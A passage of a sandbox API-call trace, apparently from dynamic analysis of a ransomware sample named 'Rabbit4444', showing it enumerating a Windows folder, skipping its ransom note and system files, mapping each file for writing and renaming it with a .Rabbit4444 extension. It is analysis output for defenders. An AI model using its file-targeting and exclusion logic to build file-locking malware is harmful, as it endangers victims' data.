lstrcmpiW (lpString1="EULA", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.367] lstrcmpiW (lpString1="EULA", lpString2="Rabbit4444.exe") returned -1 [0046.367] lstrcmpiW (lpString1="EULA", lpString2=".") returned 1 [0046.367] lstrcmpiW (lpString1="EULA", lpString2="..") returned 1 [0046.367] lstrcmpiW (lpString1="EULA", lpString2="windows") returned -1 [0046.368] lstrcmpiW (lpString1="EULA", lpString2="bootmgr") returned 1 [0046.368] lstrcmpiW (lpString1="EULA", lpString2="pagefile.sys") returned -1 [0046.368] lstrcmpiW (lpString1="EULA", lpString2="boot") returned 1 [0046.368] lstrcmpiW (lpString1="EULA", lpString2="ids.txt") returned -1 [0046.368] lstrcmpiW (lpString1="EULA", lpString2="NTUSER.DAT") returned -1 [0046.368] lstrcpyW (in: lpString1=0x130eb7a, lpString2="EULA" | out: lpString1="EULA") returned="EULA" [0046.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0046.368] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4c) returned 0x10cd98 [0046.368] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0046.368] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x52, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eula.css", cAlternateFileName="")) returned 1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="Rabbit4444.exe") returned -1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2=".") returned 1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="..") returned 1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="windows") returned -1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="bootmgr") returned 1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="pagefile.sys") returned -1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="boot") returned 1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="ids.txt") returned -1 [0046.368] lstrcmpiW (lpString1="eula.css", lpString2="NTUSER.DAT") returned -1 [0046.368] lstrcpyW (in: lpString1=0x130eb7a, lpString2="eula.css" | out: lpString1="eula.css") returned="eula.css" [0046.368] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css", dwFileAttributes=0x0) returned 1 [0046.369] lstrlenW (lpString="eula.css") returned 8 [0046.369] lstrlenW (lpString="Rabbit4444") returned 10 [0046.369] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0046.369] lstrlenW (lpString=".dll") returned 4 [0046.369] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0046.369] lstrlenW (lpString=".lnk") returned 4 [0046.369] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0046.369] lstrlenW (lpString=".ini") returned 4 [0046.369] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0046.369] lstrlenW (lpString=".sys") returned 4 [0046.369] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0046.370] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.370] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.370] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13768046224) returned 1 [0046.370] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=82) returned 1 [0046.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0046.370] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0046.370] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x298 [0046.372] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0x70000 [0046.373] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0046.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0046.374] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0046.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0046.374] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13768472364) returned 1 [0046.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0046.374] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0046.374] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.374] CloseHandle (hObject=0x298) returned 1 [0046.374] CloseHandle (hObject=0x278) returned 1 [0046.376] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\eula.css.Rabbit4444") returned 52 [0046.376] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css.rabbit4444"), dwFlags=0x1) returned 1 [0046.376] InterlockedExchangeAdd (in: Addend=0xff618, Value=96 | out: Addend=0xff618) returned 4257904 [0046.376] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 2614 [0046.376] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xef0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetStarted.png", cAlternateFileName="GETSTA~1.PNG")) returned 1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="Rabbit4444.exe") returned -1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2=".") returned 1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="..") returned 1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="windows") returned -1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="bootmgr") returned 1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="pagefile.sys") returned -1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="boot") returned 1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="ids.txt") returned -1 [0046.376] lstrcmpiW (lpString1="GetStarted.png", lpString2="NTUSER.DAT") returned -1 [0046.376] lstrcpyW (in: lpString1=0x130eb7a, lpString2="GetStarted.png" | out: lpString1="GetStarted.png") returned="GetStarted.png" [0046.377] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png", dwFileAttributes=0x0) returned 1 [0046.377] lstrlenW (lpString="GetStarted.png") returned 14 [0046.377] lstrlenW (lpString="Rabbit4444") returned 10 [0046.377] lstrcmpiW (lpString1="tarted.png", lpString2="Rabbit4444") returned 1 [0046.377] lstrlenW (lpString=".dll") returned 4 [0046.377] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.377] lstrlenW (lpString=".lnk") returned 4 [0046.377] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.377] lstrlenW (lpString=".ini") returned 4 [0046.377] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.377] lstrlenW (lpString=".sys") returned 4 [0046.377] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.377] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.377] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.377] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13768808102) returned 1 [0046.377] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3824) returned 1 [0046.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0046.377] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0046.377] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11f0, lpName=0x0) returned 0x298 [0046.378] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11f0) returned 0x70000 [0046.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0046.380] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0046.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.380] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13769107170) returned 1 [0046.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0046.380] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0046.380] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.381] CloseHandle (hObject=0x298) returned 1 [0046.381] CloseHandle (hObject=0x278) returned 1 [0046.382] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.Rabbit4444") returned 58 [0046.382] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.382] InterlockedExchangeAdd (in: Addend=0xff618, Value=3824 | out: Addend=0xff618) returned 4258000 [0046.382] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 2618 [0046.382] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea600acc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea600acc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xfe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetStartedHoverOver.png", cAlternateFileName="GETSTA~2.PNG")) returned 1 [0046.382] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.382] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="Rabbit4444.exe") returned -1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2=".") returned 1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="..") returned 1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="windows") returned -1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="bootmgr") returned 1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="pagefile.sys") returned -1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="boot") returned 1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="ids.txt") returned -1 [0046.383] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="NTUSER.DAT") returned -1 [0046.383] lstrcpyW (in: lpString1=0x130eb7a, lpString2="GetStartedHoverOver.png" | out: lpString1="GetStartedHoverOver.png") returned="GetStartedHoverOver.png" [0046.383] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png", dwFileAttributes=0x0) returned 1 [0046.383] lstrlenW (lpString="GetStartedHoverOver.png") returned 23 [0046.383] lstrlenW (lpString="Rabbit4444") returned 10 [0046.383] lstrcmpiW (lpString1="erOver.png", lpString2="Rabbit4444") returned -1 [0046.383] lstrlenW (lpString=".dll") returned 4 [0046.383] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.383] lstrlenW (lpString=".lnk") returned 4 [0046.383] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.383] lstrlenW (lpString=".ini") returned 4 [0046.383] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.383] lstrlenW (lpString=".sys") returned 4 [0046.383] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.384] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.384] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.384] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13769442602) returned 1 [0046.384] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4067) returned 1 [0046.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0046.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0046.384] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x298 [0046.385] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0x70000 [0046.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0046.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.386] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0046.386] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13769692536) returned 1 [0046.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0046.386] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0046.386] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.386] CloseHandle (hObject=0x298) returned 1 [0046.386] CloseHandle (hObject=0x278) returned 1 [0046.388] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.Rabbit4444") returned 67 [0046.388] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.388] InterlockedExchangeAdd (in: Addend=0xff618, Value=4080 | out: Addend=0xff618) returned 4261824 [0046.388] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 2620 [0046.388] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea600acc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea600acc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x43f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="loading.gif", cAlternateFileName="")) returned 1 [0046.388] lstrcmpiW (lpString1="loading.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="Rabbit4444.exe") returned -1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2=".") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="..") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="windows") returned -1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="bootmgr") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="pagefile.sys") returned -1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="boot") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="ids.txt") returned 1 [0046.389] lstrcmpiW (lpString1="loading.gif", lpString2="NTUSER.DAT") returned -1 [0046.389] lstrcpyW (in: lpString1=0x130eb7a, lpString2="loading.gif" | out: lpString1="loading.gif") returned="loading.gif" [0046.389] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif", dwFileAttributes=0x0) returned 1 [0046.389] lstrlenW (lpString="loading.gif") returned 11 [0046.389] lstrlenW (lpString="Rabbit4444") returned 10 [0046.389] lstrcmpiW (lpString1="oading.gif", lpString2="Rabbit4444") returned -1 [0046.389] lstrlenW (lpString=".dll") returned 4 [0046.389] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0046.389] lstrlenW (lpString=".lnk") returned 4 [0046.389] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0046.389] lstrlenW (lpString=".ini") returned 4 [0046.389] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0046.390] lstrlenW (lpString=".sys") returned 4 [0046.390] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0046.390] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.390] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.390] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13770048111) returned 1 [0046.390] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=17395) returned 1 [0046.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0046.390] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101958 [0046.390] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4700, lpName=0x0) returned 0x298 [0046.392] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4700) returned 0x70000 [0046.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0046.394] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0046.394] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.395] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13770529737) returned 1 [0046.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0046.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101958 | out: hHeap=0xe0000) returned 1 [0046.395] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.395] CloseHandle (hObject=0x298) returned 1 [0046.395] CloseHandle (hObject=0x278) returned 1 [0046.397] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\loading.gif.Rabbit4444") returned 55 [0046.397] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\loading.gif.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\loading.gif.rabbit4444"), dwFlags=0x1) returned 1 [0046.398] InterlockedExchangeAdd (in: Addend=0xff618, Value=17408 | out: Addend=0xff618) returned 4265904 [0046.398] InterlockedExchangeAdd (in: Addend=0xff624, Value=4 | out: Addend=0xff624) returned 2622 [0046.398] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea600acc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea600acc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x749e0600, ftLastWriteTime.dwHighDateTime=0x1d2ea8c, nFileSizeHigh=0x0, nFileSizeLow=0xe5d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lock.png", cAlternateFileName="")) returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="Rabbit4444.exe") returned -1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2=".") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="..") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="windows") returned -1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="bootmgr") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="pagefile.sys") returned -1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="boot") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="ids.txt") returned 1 [0046.398] lstrcmpiW (lpString1="lock.png", lpString2="NTUSER.DAT") returned -1 [0046.398] lstrcpyW (in: lpString1=0x130eb7a, lpString2="lock.png" | out: lpString1="lock.png") returned="lock.png" [0046.398] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png", dwFileAttributes=0x0) returned 1 [0046.399] lstrlenW (lpString="lock.png") returned 8 [0046.399] lstrlenW (lpString="Rabbit4444") returned 10 [0046.399] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0046.399] lstrlenW (lpString=".dll") returned 4 [0046.399] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.399] lstrlenW (lpString=".lnk") returned 4 [0046.399] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.399] lstrlenW (lpString=".ini") returned 4 [0046.399] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.399] lstrlenW (lpString=".sys") returned 4 [0046.399] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.399] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.400] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.400] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13771029846) returned 1 [0046.400] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3677) returned 1 [0046.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, 